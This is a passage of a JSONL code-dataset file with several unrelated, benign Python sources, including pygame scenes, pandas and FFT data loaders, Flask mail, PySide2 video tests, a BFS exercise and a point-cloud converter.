pygame.font.Font(None, 30)\n label = font.render(self.text, 1, (255, 255, 255))\n label_rect = label.get_rect()\n label_rect.center = ((self.screen.get_width() / 2, self.screen.get_height() / 2))\n self.screen.blit(label, label_rect)\n pygame.display.flip()\n \nclass Game(Scene):\n def __init__(self, s):\n Scene.__init__(self, s)\n \n level = Level(self)\n level.generate_random(self.screen.get_width() / 32, self.screen.get_height() / 32)\n \n self.trees = level.trees\n \n self.axe = Axe(self, [100, 100],self.sprites, self.tools, self.items)\n \n self.gun = Revolver(self, [200, 200], self.sprites)\n \n self.player = Player(self, [0, 0], self.sprites, self.player_group)\n \n self.finished = False\n \n self.running = False\n \n def run(self):\n self.running = True\n \n while self.running:\n for event in pygame.event.get():\n if event.type == QUIT: self.quit()\n \n if self.trees == 0: #self.quit()\n self.finished = True\n \n if self.finished:\n self.sprites.empty()\n return\n \n self.screen.fill([140, 255, 115])\n self.sprites.draw(self.screen)\n self.sprites.update()\n pygame.display.flip()\n self.clock.tick(60)\n \n \n def quit(self):\n pygame.quit()\n sys.exit(0)\n\nclass BossBattle(Scene):\n def __init__(self, s):\n Scene.__init__(self, s)\n \n self.boss = DreadMonster(self, self.sprites)\n self.gun = Revolver(self, [200, 200], self.sprites) \n self.player = Player(self, [0, 0], self.sprites, self.player_group)\n \n self.boss_defeated = False\n \n self.axe = Axe(self, [-1000, -1000],self.sprites, self.tools, self.items)\n d = DreadBullet(self, [200, 200], self.sprites)\n \n def run(self):\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n sys.exit()\n \n if self.boss_defeated:\n return\n \n self.screen.fill([255, 0, 0])\n self.sprites.draw(self.screen)\n self.sprites.update()\n pygame.display.flip()\n self.clock.tick(60) \n\n","sub_path":"Scenes.py","file_name":"Scenes.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"364467262","text":"import numpy as np\nimport pandas as pd\n\nfrom datetime import datetime\nfrom datetime import timezone\nfrom zipfile import ZipFile\nimport os\n\n\ndef make_df(start_time, end_time, path = 'data'):\n timestamps = sorted(os.listdir(os.path.join(path, 
'timestamps')))\n start_timestamp, end_timestamp = make_timestamps_from_datetime(start_time, end_time, timestamps)\n interval = make_interval(start_timestamp, end_timestamp, timestamps)\n try:\n with ZipFile(os.path.join(path, 'timestamps.zip')) as timestamps_zip:\n df_list = [pd.read_csv(timestamps_zip.open(\"timestamps/\" + file), header=None,\n names=['fullVisitorId', 'url_id', 'visitStartTime']) for file in interval]\n except:\n df_list = [pd.read_csv(os.path.join(path, 'timestamps/') + file, header=None, names=['fullVisitorId', 'url_id', 'visitStartTime'])\n for file in interval]\n\n df = pd.concat(df_list)\n labels, levels = pd.factorize(df['fullVisitorId'])\n df['user_id'] = labels\n df.set_index(['user_id', 'url_id'], inplace=True, drop=True)\n return df\n\n\n# first = 12/03/2017 07:00:00, last = 14/04/2017 11:11:29 1491818423 1491991225\ndef make_timestamps_from_datetime(start_time, end_time, timestamps):\n if start_time == 'first':\n start_timestamp = timestamps[0]\n else:\n start_datetime = datetime.strptime(start_time, '%d/%m/%Y %H:%M:%S')\n start_timestamp = (start_datetime - datetime(1970, 1, 1)).total_seconds()\n\n if end_time == 'last':\n end_timestamp = timestamps[-1]\n else:\n end_datetime = datetime.strptime(end_time, '%d/%m/%Y %H:%M:%S')\n end_timestamp = (end_datetime - datetime(1970, 1, 1)).total_seconds()\n return (start_timestamp, end_timestamp)\n\n\ndef make_interval(start_timestamp, end_timestamp, timestamps):\n start_timestamp = str(start_timestamp)\n end_timestamp = str(end_timestamp)\n interval = [t for t in timestamps if t >= start_timestamp and t <= end_timestamp]\n return interval\n\n\n# Using texts.csv to make urls for each url_id\ndef make_urls_df(path = 'data'):\n texts = pd.read_csv(os.path.join(path, 'texts.csv'))\n tag_cleaned = texts['tag'].str.split().str.get(0)\n texts['tag_cleaned'] = tag_cleaned\n texts['url_id'] = texts['url_id'].astype(str)\n texts['pagePath'] = '/t/' + texts['tag_cleaned'] + '/' + texts['url_id']\n texts.set_index(['url_id'], inplace=True)\n urls = texts.drop(['subtitle', 'tag', 'title', 'tag_cleaned'], axis=1)\n return urls\n\n\ndef merge_df(df, urls):\n df.reset_index(level=['url_id'], inplace=True)\n df.reset_index(level=['user_id'], inplace=True)\n urls.reset_index(level=['url_id'], inplace=True)\n urls['url_id'] = urls['url_id'].astype(int)\n df['fullVisitorId'] = df['fullVisitorId'].astype(str)\n df_result = pd.merge(df, urls, on='url_id', how='left')\n labels, levels = pd.factorize(df_result['url_id'])\n df_result['url_id'] = labels\n df_result.set_index(['user_id', 'url_id'], inplace=True)\n df_result.sort_index(inplace=True)\n return df_result\n\nif __name__ == \"__main__\":\n df = make_df('15/03/2017 10:00:00', '16/03/2017 10:00:00')\n urls = make_urls_df()\n df_result = merge_df(df, urls)","sub_path":"read_life_dataset.py","file_name":"read_life_dataset.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255496145","text":"from flask.ext.mail import Message\nfrom threading import Thread\nfrom . 
import mail\nfrom flask import current_app, render_template\n\ndef send_sync_mail(app, msg):\n\twith app.app_context():\n\t\tmail.send(msg)\n\n\ndef send_mail(to, subject, template, **kwargs):\n\tapp = current_app._get_current_object()\n\tmsg = Message(app.config['FLASK_MAIL_SUBJECT_PREFIX'] + subject,\\\n\t\tsender=app.config['FLASK_MAIL_SENDER'], recipients=[to])\n\tmsg.body = render_template(template+'.txt', **kwargs)\n\tmsg.html = render_template(template+'.html', **kwargs)\n\tthr = Thread(target=send_sync_mail, args=[app, msg])\n\tthr.start()\n\treturn thr","sub_path":"app/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"402313815","text":"# -*- coding: utf-8 -*-\nimport sys\n\nfrom PySide2.QtCore import QUrl\nfrom PySide2.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PySide2.QtMultimediaWidgets import QGraphicsVideoItem, QVideoWidget\nfrom PySide2.QtWidgets import *\n\n\nclass MainView(QGraphicsView):\n    def __init__(self, parent=None):\n        super(MainView, self).__init__(parent)\n\n\nclass MyApp(QWidget):\n    def __init__(self):\n        super(MyApp, self).__init__()\n\n        self.master_layout = QVBoxLayout()\n\n        player = QMediaPlayer()\n        item = QGraphicsVideoItem()\n        player.setVideoOutput(item)\n        player.setMedia((QUrl(\"D:/test/1.mov\")))\n        graphicsView = MainView()\n        graphicsView.scene().addItem(item)\n        graphicsView.show()\n\n        self.master_layout.addWidget(graphicsView)\n        self.setLayout(self.master_layout)\n        player.play()\n\n\ndef test():\n    url = QUrl.fromLocalFile(\"D:/test/1.mov\")\n    content = QMediaContent(url)\n    player = QMediaPlayer()\n    player.setMedia(content)\n    # player.setVolume(Sound_level)\n    player.play()\n\n\ndef test2():\n    url = QUrl.fromLocalFile(\"D:/test/2.mp4\")\n    content = QMediaContent(url)\n    player = QMediaPlayer()\n    vw = QVideoWidget()\n    vw.show()\n    player.play()\n    player.setVideoOutput(vw)\n    player.setMedia(content)\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    # window = MyApp()\n    # window.show()\n    test2()\n    sys.exit(app.exec_())\n","sub_path":"test/ps2/api/mm/videoItem.py","file_name":"videoItem.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"525499325","text":"import os\r\nimport pandas as pd\r\nfrom scipy.io import loadmat\r\nfrom sklearn.model_selection import train_test_split\r\nfrom datasets.SequenceDatasets import dataset\r\nfrom datasets.sequence_aug import *\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\n\r\nsignal_size = 1024\r\n\r\n\r\nADBdata_source=[['KA05'],['KA03'],['KI03']]\r\nADBdata_target=[['KA01','KA07'],['KA08'],['KI01']]\r\nlabel=[i for i in range(3)]\r\n\r\n#3 Bearings with real damages caused by accelerated lifetime tests(14x)\r\n\r\n#working condition\r\nWC = [\"N15_M07_F10\",\"N09_M07_F10\",\"N15_M01_F10\",\"N15_M07_F04\"]\r\n#state = WC[0] #WC[0] can be changed to different working states\r\n\r\n#generate Training Dataset and Testing Dataset\r\ndef get_files(root, N):\r\n    work_condition=0\r\n    '''\r\n    This function is used to generate the final training set and test set.\r\n    root:The location of the data set\r\n    '''\r\n    data = []\r\n    lab = []\r\n    if N[0]==0:\r\n        state = WC[work_condition] # WC[0] can be changed to different working states\r\n        for j in range(len(ADBdata_source)):\r\n            state1=ADBdata_source[j]\r\n            for k in range(len(state1)):\r\n                for w3 in range(1):\r\n                    name3 = state + 
\"_\"+state1[k]+\"_\"+ str(w3 + 1)\r\n path3 = os.path.join('/tmp', root,state1[k] , name3 + \".mat\")\r\n data3, lab3= data_load(path3,name=name3,label=label[j])\r\n data += data3\r\n lab += lab3\r\n elif N[0]==1:\r\n state = WC[work_condition] # WC[0] can be changed to different working states\r\n for j in range(len(ADBdata_target)):\r\n state1 = ADBdata_target[j]\r\n for k in range(len(state1)):\r\n for w3 in range(1):\r\n name3 = state + \"_\"+state1[k]+\"_\"+ str(w3 + 1)\r\n path3 = os.path.join('/tmp', root,state1[k] , name3 + \".mat\")\r\n data3, lab3 = data_load(path3, name=name3, label=label[j])\r\n #if w3 == 0 and state1[k] == 'KI01':\r\n #print(data3)\r\n data += data3\r\n lab += lab3\r\n\r\n return [data,lab]\r\n\r\ndef data_load(filename,name,label):\r\n '''\r\n This function is mainly used to generate test data and training data.\r\n filename:Data location\r\n '''\r\n fl = loadmat(filename)[name]\r\n fl = fl[0][0][2][0][6][2] #Take out the data\r\n fl = fl.reshape(-1,)\r\n data=[]\r\n lab=[]\r\n start,end=0,signal_size\r\n while end<=fl.shape[0]:\r\n x = fl[start:end]\r\n x = np.fft.fft(x)\r\n x = np.abs(x) / len(x)\r\n x = x[range(int(x.shape[0] / 2))]\r\n x = x.reshape(-1,1)\r\n data.append(x)\r\n lab.append(label)\r\n start +=signal_size\r\n end +=signal_size\r\n\r\n return data, lab\r\n\r\n#--------------------------------------------------------------------------------------------------------------------\r\nclass PUFFT_type(object):\r\n num_classes = 3\r\n inputchannel = 1\r\n\r\n def __init__(self, data_dir, transfer_task, normlizetype=\"0-1\"):\r\n self.data_dir = data_dir\r\n self.source_N = transfer_task[0]\r\n self.target_N = transfer_task[1]\r\n self.normlizetype = normlizetype\r\n self.data_transforms = {\r\n 'train': Compose([\r\n Reshape(),\r\n Normalize(self.normlizetype),\r\n # RandomAddGaussian(),\r\n # RandomScale(),\r\n # RandomStretch(),\r\n # RandomCrop(),\r\n Retype(),\r\n # Scale(1)\r\n ]),\r\n 'val': Compose([\r\n Reshape(),\r\n Normalize(self.normlizetype),\r\n Retype(),\r\n # Scale(1)\r\n ])\r\n }\r\n\r\n def data_split(self, transfer_learning=True):\r\n if transfer_learning:\r\n # get source train and val\r\n list_data = get_files(self.data_dir, self.source_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n train_pd, val_pd = train_test_split(data_pd, test_size=0.2, random_state=40, stratify=data_pd[\"label\"])\r\n source_train = dataset(list_data=train_pd, transform=self.data_transforms['train'])\r\n source_val = dataset(list_data=val_pd, transform=self.data_transforms['val'])\r\n\r\n # get target train and val\r\n list_data = get_files(self.data_dir, self.target_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n train_pd, val_pd = train_test_split(data_pd, test_size=0.2, random_state=40, stratify=data_pd[\"label\"])\r\n target_train = dataset(list_data=train_pd, transform=self.data_transforms['train'])\r\n target_val = dataset(list_data=val_pd, transform=self.data_transforms['val'])\r\n return source_train, source_val, target_train, target_val\r\n else:\r\n #get source train and val\r\n list_data = get_files(self.data_dir, self.source_N)\r\n data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n train_pd, val_pd = train_test_split(data_pd, test_size=0.2, random_state=40, stratify=data_pd[\"label\"])\r\n source_train = dataset(list_data=train_pd, transform=self.data_transforms['train'])\r\n source_val = dataset(list_data=val_pd, 
transform=self.data_transforms['val'])\r\n\r\n            # get target train and val\r\n            list_data = get_files(self.data_dir, self.target_N)\r\n            data_pd = pd.DataFrame({\"data\": list_data[0], \"label\": list_data[1]})\r\n            target_val = dataset(list_data=data_pd, transform=self.data_transforms['val'])\r\n            return source_train, source_val, target_val\r\n\r\n","sub_path":"datasets/PUFFT_type.py","file_name":"PUFFT_type.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"534932469","text":"\"\"\"\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times).\n\nNote: You may not engage in multiple transactions at the same time (i.e., you must sell the stock before you buy again).\n\n\n\nSource: LeetCode (LeetCode China)\nLink: https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-ii\nThe copyright belongs to LeetCode Network. For commercial reprints, please contact them for official authorization; for non-commercial reprints, please cite the source.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n\n\tdef maxProfit(self, prices: List[int]) -> int:\n\t\tprofit = 0\n\t\tfor i in range(0, len(prices) - 1):\n\t\t\tif prices[i + 1] > prices[i]:\n\t\t\t\tprofit += prices[i + 1] - prices[i]\n\t\t\t\t# Traverse the list: whenever the next price is higher than the current one, add the difference to the profit.\n\t\treturn profit","sub_path":"Best Time to Buy and Sell Stock II.py","file_name":"Best Time to Buy and Sell Stock II.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"504331866","text":"__author__ = 'Alex'\n\n# Nothing working.\nimport pymel.core as pmc\n\nfrom AWGeneral import *\nfrom awSettings import *\n\ndef reskinSubDiv(mesh, subDMeshes, history, smooth):\n    curSel = getCurrentSelectionList()\n    meshHistory = pmc.listHistory(mesh)\n    if len(mesh) == 1:\n        # set this up.\n        reskinSubD(mesh, subDMeshes, history, smooth)\n\ndef reskinSubD(mesh, subDMesh, history, smooth):\n    curSel = getCurrentSelectionList()\n    meshHistory = pmc.listHistory(mesh)\n    skinCluster = pmc.ls(meshHistory, type='skinCluster')\n    if skinCluster:\n        attachedJoints = pmc.listConnections(skinCluster[0], type='joint')\n        pmc.select(subDMesh)\n        if history:\n            pmc.deleteHistory()\n        unlockAttrs(subDMesh, ['translate', 'rotate', 'scale'])\n        pmc.makeIdentity(apply=True, t=True, r=True, s=True, n=False)\n\n        if len(attachedJoints) > 0:\n            pmc.select(attachedJoints, add=True)\n            # new Skin Cluster (assumption: bind the subD mesh to the same joints before copying weights)\n            newSkinCluster = pmc.skinCluster(attachedJoints, subDMesh, toSelectedBones=True)\n            pmc.select(mesh, replace=True)\n            pmc.select(subDMesh, add=True)\n            if smooth:\n                pmc.copySkinWeights(ss=skinCluster[0], ds=newSkinCluster, noMirror=True, smooth=True)\n            else:\n                pmc.copySkinWeights(ss=skinCluster[0], ds=newSkinCluster, noMirror=True)\n    else:\n        pmc.displayWarning(wNOSKINCLUSTER)\n    pmc.select(curSel)\n\n\n\n\n\n\n\n\n\n","sub_path":"libs/awSkin.py","file_name":"awSkin.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"513972811","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.3 (62011)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: \\Ft\\Lib\\DistExt\\Formatters\\ApiFormatter.py\n# Compiled at: 2006-08-12 10:56:26\nimport os, re, pydoc, inspect, types, imp, stat, time, XmlFormatter\n_builtin_types = 
vars(types).values()\n_builtin_types = [ t for t in _builtin_types if type(t) is types.TypeType ]\n_global_module_names = (\n '__builtin__', 'exceptions')\n_re_arglist = re.compile(' *[a-zA-Z_][a-zA-Z0-9_]* *\\\\((?P<arglist>[^)]*) *\\\\)')\ntry:\n    _visiblename = pydoc.visiblename\nexcept AttributeError:\n    _special_names = [\n        'builtins', 'doc', 'file', 'path', 'module', 'name']\n    _special_names = [ '__%s__' % name for name in _special_names ]\n\n    def _visiblename(name):\n        \"\"\"Decide whether to show documentation on a variable.\"\"\"\n        if name in _special_names:\n            return 0\n        if name.startswith('__') and name.endswith('__'):\n            return 1\n        return not name.startswith('_')\n\n\nclass ApiFormatter(XmlFormatter.XmlFormatter):\n    __module__ = __name__\n    document_type = types.ModuleType\n\n    def __init__(self, command, modules):\n        XmlFormatter.XmlFormatter.__init__(self, command)\n        self.module_info = modules\n        return\n\n    def ispublic(self, name):\n        if hasattr(self.module, '__all__'):\n            return name in self.module.__all__ and 'yes' or 'no'\n        else:\n            return not name.startswith('_') and 'yes' or 'no'\n\n    def isdocumented(self, name):\n        return name in self.module_info and 'yes' or 'no'\n\n    def document(self, module):\n        \"\"\"\n        Produce documentation for a given module object.\n        \"\"\"\n        module_name = module.__name__\n        attributes = {'name': module_name}\n        self.start_element('module', attributes)\n        (absfile, module_type) = self.module_info[module_name]\n        mtime = os.stat(absfile)[stat.ST_MTIME]\n        mtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(mtime))\n        self.write_element('modification-date', content=mtime)\n        self.write_description(module)\n        for attr in ['author', 'credits', 'date', 'version']:\n            if hasattr(module, '__%s__' % attr):\n                content = self.escape(str(getattr(module, '__%s__' % attr)))\n                self.write_element(attr, content=content)\n\n        submodules = []\n        if module_type == imp.PKG_DIRECTORY:\n            name = re.escape(module_name)\n            submodule_match = re.compile('^%s\\\\.([^.]+)$' % name).match\n            for fullname in self.module_info:\n                match = submodule_match(fullname)\n                if match:\n                    name = match.group(1)\n                    try:\n                        submod = pydoc.safeimport(fullname)\n                    except:\n                        submod = None\n                    else:\n                        if submod is None:\n                            submod = imp.new_module(fullname)\n                    submodules.append((name, submod))\n\n        all = getattr(module, '__all__', [])\n        for (name, member) in inspect.getmembers(module, inspect.ismodule):\n            if name in all:\n                submodules.append((name, member))\n\n        if submodules:\n            submodules.sort()\n            self.section('modules', submodules, self.doc_submodule)\n\n        def isclass(object):\n            \"\"\"\n            Replacement for inspect's broken isclass() which fails for\n            instances of classes which define a custom __getattr__.\n            \"\"\"\n            return isinstance(object, (types.ClassType, type))\n\n        classes = [ t for t in inspect.getmembers(module, isclass) if (inspect.getmodule(t[1]) or module) is module or t[0] in all ]\n        if classes:\n            self.section('classes', classes, self.doc_class)\n        funcs = [ t for t in inspect.getmembers(module, inspect.isroutine) if (inspect.getmodule(t[1]) or module) is module or t[0] in all ]\n        if funcs:\n            self.section('functions', funcs, self.doc_function)\n        globals = [ t for t in inspect.getmembers(module, pydoc.isdata) if t[0] in all or _visiblename(t[0]) ]\n        if globals:\n            self.section('globals', globals, self.doc_global)\n        self.end_element('module')\n        return\n        return\n\n    def doc_submodule(self, module, name):\n        \"\"\"Produce XML documentation for a submodule\"\"\"\n        realname = module.__name__\n        name = name or realname\n        attributes = 
{'name': name, 'realname': realname, 'public': name.startswith('_') and 'no' or 'yes', 'documented': self.isdocumented(realname)}\n self.start_element('module-reference', attributes)\n self.write_description(module)\n self.end_element('module-reference')\n return\n\n def doc_class(self, klass, name):\n \"\"\"Produce XML documentation for a given class object.\"\"\"\n realname = klass.__name__\n name = name or realname\n attributes = {'name': name, 'public': self.ispublic(name)}\n if name != realname:\n attributes['realname'] = realname\n self.start_element('class', attributes)\n if klass.__bases__:\n self.start_element('bases')\n for base in klass.__bases__:\n attributes = {'class': base.__name__, 'documented': self.isdocumented(base.__module__)}\n if base.__module__ not in _global_module_names:\n attributes['module'] = base.__module__\n self.write_element('base', attributes)\n\n self.end_element('bases')\n self.write_description(klass)\n self.start_element('method-resolution-order')\n mro = list(inspect.getmro(klass))\n bases = {}\n for base in mro:\n attributes = {'name': base.__name__}\n if base.__module__ not in _global_module_names:\n attributes['module'] = base.__module__\n self.write_element('base', attributes)\n\n self.end_element('method-resolution-order')\n attrs = inspect.classify_class_attrs(klass)\n attrs = [ t for t in attrs if _visiblename(t[0]) ]\n while attrs:\n if mro:\n thisclass = mro.pop(0)\n else:\n thisclass = attrs[0][2]\n inherited_attrs = [ t for t in attrs if t[2] is not thisclass ]\n attrs = [ t for t in attrs if t[2] is thisclass ]\n attrs.sort()\n methods = []\n members = []\n for (name, kind, homecls, obj) in attrs:\n if kind == 'method':\n obj = getattr(klass, name)\n elif inspect.isbuiltin(obj):\n kind = 'method'\n info = (obj, name, homecls, kind)\n if kind.endswith('method'):\n methods.append(info)\n else:\n members.append(info)\n\n inherited = thisclass is not klass\n if inherited:\n attributes = {'class': thisclass.__name__, 'documented': self.isdocumented(thisclass.__module__)}\n if thisclass.__module__ not in _global_module_names:\n attributes['module'] = thisclass.__module__\n if methods:\n self.start_element('inherited-methods', attributes)\n for info in methods:\n self.doc_inherited(*info)\n\n self.end_element('inherited-methods')\n if members:\n self.start_element('inherited-members', attributes)\n for info in members:\n self.doc_inherited(*info)\n\n self.end_element('inherited-members')\n else:\n if methods:\n self.start_element('methods', attributes)\n for info in methods:\n if inspect.ismethoddescriptor(info[0]):\n self.doc_methoddescriptor(*info)\n else:\n self.doc_method(*info)\n\n self.end_element('methods')\n if members:\n self.start_element('members', attributes)\n for info in members:\n self.doc_member(*info)\n\n self.end_element('members')\n attrs = inherited_attrs\n\n self.end_element('class')\n return\n\n def format_arg(self, arg, default=None):\n attributes = {}\n if default is not None:\n attributes['default'] = default\n if type(arg) in [types.TupleType, types.ListType]:\n self.start_element('sequence', attributes)\n for a in arg:\n self.format_arg(a)\n\n self.end_element('sequence')\n else:\n attributes['name'] = arg\n self.write_element('arg', attributes)\n return\n return\n\n def doc_arguments(self, object):\n self.start_element('arguments')\n if inspect.isfunction(object):\n (args, varargs, varkw, defaults) = inspect.getargspec(object)\n if defaults:\n firstdefault = len(args) - len(defaults)\n for i in xrange(len(args)):\n if 
defaults and i >= firstdefault:\n default = repr(defaults[(i - firstdefault)])\n else:\n default = None\n self.format_arg(args[i], default)\n\n if varargs:\n self.write_element('var-args', {'name': varargs})\n if varkw:\n self.write_element('var-keywords', {'name': varkw})\n else:\n arglist = '...'\n if inspect.isbuiltin(object):\n match = _re_arglist.match(pydoc.getdoc(object))\n if match:\n arglist = match.group('arglist')\n self.write_element('unknown', content=arglist)\n self.end_element('arguments')\n return\n return\n\n def doc_method(self, method, name, klass, kind):\n \"\"\"\n Document a method, class method or static method as given by 'kind'\n \"\"\"\n attributes = {'name': name, 'id': klass.__name__ + '-' + name, 'public': self.ispublic(name)}\n realname = method.__name__\n if name != realname:\n attributes['realname'] = realname\n if getattr(klass, realname, None) == method:\n attributes['realid'] = klass.__name__ + '-' + realname\n tagname = kind.replace(' ', '-')\n self.start_element(tagname, attributes)\n self.write_description(method)\n func = getattr(method, 'im_func', method)\n self.doc_arguments(func)\n for base in inspect.getmro(klass)[1:]:\n overridden = getattr(base, name, None)\n if overridden:\n attributes = {'class': base.__name__, 'documented': self.isdocumented(base.__module__)}\n if base.__module__ not in _global_module_names:\n attributes['module'] = base.__module__\n self.write_element('overrides', attributes)\n break\n\n self.end_element(tagname)\n return\n return\n\n def doc_methoddescriptor(self, descr, name, klass, kind):\n \"\"\"\n Document a class method or static method as given by 'kind'\n \"\"\"\n attributes = {'name': name, 'id': klass.__name__ + '-' + name, 'public': self.ispublic(name)}\n tagname = kind.replace(' ', '-')\n self.start_element(tagname, attributes)\n self.write_description(descr)\n self.doc_arguments(descr)\n self.end_element(tagname)\n return\n\n def doc_member(self, object, name, klass, kind):\n \"\"\"Produce XML documentation for a data object.\"\"\"\n attributes = {'name': name, 'id': klass.__name__ + '-' + name, 'public': self.ispublic(name)}\n self.start_element('member', attributes)\n if (callable(object) or kind == 'property') and hasattr(object, '__doc__') and getattr(object, '__doc__'):\n self.write_description(object)\n self.write_element('value', content=self.repr(object))\n self.end_element('member')\n return\n\n def doc_inherited(self, object, name, klass, kind):\n \"\"\"Produce XML documentation for an inherited object.\"\"\"\n attributes = {'name': name, 'public': self.ispublic(name)}\n self.write_element('member-reference', attributes)\n return\n\n def doc_function(self, func, name):\n \"\"\"\n Document a function\n \"\"\"\n realname = func.__name__\n if realname == '':\n realname = 'lambda'\n name = name or realname\n attributes = {'name': name, 'id': name, 'public': self.ispublic(name)}\n if name != realname:\n attributes['realname'] = realname\n self.start_element('function', attributes)\n self.write_description(func)\n self.doc_arguments(func)\n self.end_element('function')\n return\n\n def doc_global(self, object, name):\n \"\"\"Produce XML documentation for a data object.\"\"\"\n attributes = {'name': name, 'id': name, 'public': self.ispublic(name)}\n self.start_element('global', attributes)\n if isinstance(object, types.InstanceType) and object.__doc__ != object.__class__.__doc__ or type(object) not in _builtin_types and hasattr(object, '__doc__') and getattr(object, '__doc__'):\n 
self.write_description(object)\n self.write_element('value', content=self.repr(object))\n self.end_element('global')\n return\n\n def write_description(self, object):\n \"\"\"Produce XML tag(s) for an object description.\"\"\"\n docstring = self.escape(pydoc.getdoc(object))\n paragraphs = docstring.split('\\n\\n')\n if paragraphs:\n abstract = paragraphs[0]\n description = ('\\n\\n').join(paragraphs[1:])\n else:\n abstract = None\n description = None\n self.write_element('abstract', content=abstract)\n self.write_element('description', content=description)\n return\n return\n\n\nif not hasattr(inspect, 'getmro'):\n\n def _searchbases(cls, accum):\n if cls in accum:\n return\n accum.append(cls)\n for base in cls.__bases__:\n _searchbases(base, accum)\n\n\n def getmro(cls):\n \"\"\"Return list of base classes (including cls) in method resolution order.\"\"\"\n result = []\n _searchbases(cls, result)\n return result\n\n\n inspect.getmro = getmro\nif not hasattr(inspect, 'classify_class_attrs'):\n\n def classify_class_attrs(cls):\n \"\"\"Return list of attribute-descriptor tuples.\n\n For each name defined on class, cls, the return list contains a\n 4-tuple with these elements:\n\n 0. The name (a string).\n\n 1. The kind of attribute this is, one of these strings:\n 'method' any flavor of method\n 'data' not a method\n\n 2. The class which defined this attribute (a class).\n\n 3. The object as obtained directly from the defining class's\n __dict__, not via getattr.\n \"\"\"\n bases = getmro(cls)\n bases.reverse()\n combined = {}\n for baseclass in bases:\n for (name, value) in baseclass.__dict__.items():\n combined[name] = (\n baseclass, value)\n\n names = combined.keys()\n names.sort()\n result = []\n for name in names:\n (true_class, obj) = combined[name]\n if inspect.ismethod(getattr(cls, name)):\n kind = 'method'\n else:\n kind = 'data'\n result.append((name, kind, true_class, obj))\n\n return result\n\n\n inspect.classify_class_attrs = classify_class_attrs","sub_path":"pycfiles/51degrees-mobile-detector-lite-pattern-wrapper-1.0.tar/ApiFormatter.py","file_name":"ApiFormatter.py","file_ext":"py","file_size_in_byte":15949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"296334438","text":"\nimport numpy as np\nimport queue\n\nroadmap = np.loadtxt(\"map.txt\", dtype=str, delimiter=' ')\n\nstart = 'Arad'\nend = 'Bucharest'\n\n\ndef solution(neighbors, start, end):\n for x in neighbors:\n if(start == x[0] and end == x[len(x)-1]):\n return x\n\n\ndef expand(road, current, fringe, closed, paths):\n neighbors = []\n for x in road:\n if x[0] == current:\n if x[1] not in list(closed.queue):\n fringe.put(x[1])\n neighbors.append(x[1])\n for y in paths:\n if y[len(y)-1] == current:\n for neighbor in neighbors:\n z = y+[neighbor]\n paths.append(z)\n paths.remove(y)\n\n return paths\n\n\ndef BFS(start, end):\n fringe = queue.Queue()\n closed = queue.Queue()\n fringe.put(start)\n\n paths = [[start]]\n while(fringe.empty() == False):\n current = fringe.get()\n if current not in list(closed.queue):\n closed.put(current)\n if current == end:\n return solution(paths, start, end)\n else:\n expand(roadmap, current, fringe, closed, paths)\n\n print(\"-----fringe-------\", list(fringe.queue))\n\n return \"no solution\"\n\n\nprint(\"/-----------------------------BFS solution ---------------------------/\", BFS(start, 
end))\n","sub_path":"06cntt1_0650080033__PhamMinhThien_BFS/BFS.py","file_name":"BFS.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"213414158","text":"from django.test import SimpleTestCase\n\nfrom ..apps import TmcConfig\n\n\nclass AppConfigTestCase(SimpleTestCase):\n\n def test_ready(self) -> None:\n from django.apps.registry import apps\n\n tmc_app_config = apps.app_configs['tmc']\n app_config = TmcConfig(\n app_name=tmc_app_config.name,\n app_module=tmc_app_config.module,\n )\n\n # Nothing should be raised.\n app_config.ready()\n","sub_path":"tmc/tests/test_apps.py","file_name":"test_apps.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440522563","text":"import sys\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom pcd_io import read_pcd\nfrom ply_io import write_ply\n\ndef apply_rotation(M, df):\n\n if 'a' not in df.columns:\n df.loc[:, 'a'] = 1\n r_ = np.dot(M, df[['x', 'y', 'z', 'a']].T).T\n df.loc[:, ['x', 'y', 'z']] = r_[:, :3]\n return df\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--pcd', nargs='*', help='pcd files')\n parser.add_argument('-r', '--rotation', action='store_true', help='pcd files')\n parser.add_argument('--combine', nargs=1, default=False, help='name of .ply with all point clouds merged')\n parser.add_argument('--colour', nargs=1, default=False, help='add colour to point cloud')\n args = 